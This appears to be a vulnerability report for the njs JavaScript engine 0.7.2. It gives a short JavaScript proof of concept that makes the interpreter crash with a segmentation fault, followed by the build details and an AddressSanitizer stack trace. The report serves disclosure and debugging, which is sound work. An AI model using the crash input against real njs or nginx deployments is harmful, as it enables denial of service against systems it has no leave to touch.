SEGV njs_lvlhsh.c:231:17 in njs_lvlhsh_bucket_find

[Q1IQ]

Environment

OS      : Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit  : 7bd570b39297d3d91902c93a624c89b08be7a6fe
Version : 0.7.2
Build   : 
          NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
          NJS_CFLAGS="$NJS_CFLAGS -fno-omit-frame-pointer"

Proof of concept

function f2(v) {
    Object.prototype.toString = v;
}

Object.prototype.toString = f2;

function f() {
    "includes"[{}]();
}

new Promise(f);
String.fromCharCode(0,parseInt);

Stack dump

AddressSanitizer:DEADLYSIGNAL
=================================================================
==2064577==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000004cac48 bp 0x7ffcc1edfbf0 sp 0x7ffcc1edfbb0 T0)
==2064577==The signal is caused by a READ memory access.
==2064577==Hint: this fault was caused by a dereference of a high value address (see register values below).  Dissassemble the provided pc to learn which register was used.
    #0 0x4cac48 in njs_lvlhsh_bucket_find /home/q1iq/Documents/origin/njs/src/njs_lvlhsh.c:231:17
    #1 0x4cac48 in njs_lvlhsh_find /home/q1iq/Documents/origin/njs/src/njs_lvlhsh.c:181:20
    #2 0x516c4f in njs_object_property /home/q1iq/Documents/origin/njs/src/njs_object_prop.c:59:15
    #3 0x4d5963 in njs_value_to_primitive /home/q1iq/Documents/origin/njs/src/njs_value.c:159:19
    #4 0x4fb3ab in njs_value_to_number /home/q1iq/Documents/origin/njs/src/njs_value_conversion.h:18:15
    #5 0x4fb3ab in njs_value_to_numeric /home/q1iq/Documents/origin/njs/src/njs_value_conversion.h:54:11
    #6 0x4fb3ab in njs_string_from_char_code /home/q1iq/Documents/origin/njs/src/njs_string.c:2036:19
    #7 0x53bf9c in njs_function_native_call /home/q1iq/Documents/origin/njs/src/njs_function.c:739:11
    #8 0x4e47fa in njs_vmcode_interpreter /home/q1iq/Documents/origin/njs/src/njs_vmcode.c:785:23
    #9 0x53b43a in njs_function_lambda_call /home/q1iq/Documents/origin/njs/src/njs_function.c:703:11
    #10 0x4e47fa in njs_vmcode_interpreter /home/q1iq/Documents/origin/njs/src/njs_vmcode.c:785:23
    #11 0x4deb7b in njs_vm_start /home/q1iq/Documents/origin/njs/src/njs_vm.c:493:11
    #12 0x4c8099 in njs_process_script /home/q1iq/Documents/origin/njs/src/njs_shell.c:903:19
    #13 0x4c7484 in njs_process_file /home/q1iq/Documents/origin/njs/src/njs_shell.c:632:11
    #14 0x4c7484 in main /home/q1iq/Documents/origin/njs/src/njs_shell.c:316:15
    #15 0x7f4beb9e10b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #16 0x41dabd in _start (/home/q1iq/Documents/origin/njs/build/njs+0x41dabd)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/q1iq/Documents/origin/njs/src/njs_lvlhsh.c:231:17 in njs_lvlhsh_bucket_find
==2064577==ABORTING

Credit

Q1IQ(@Q1IQ)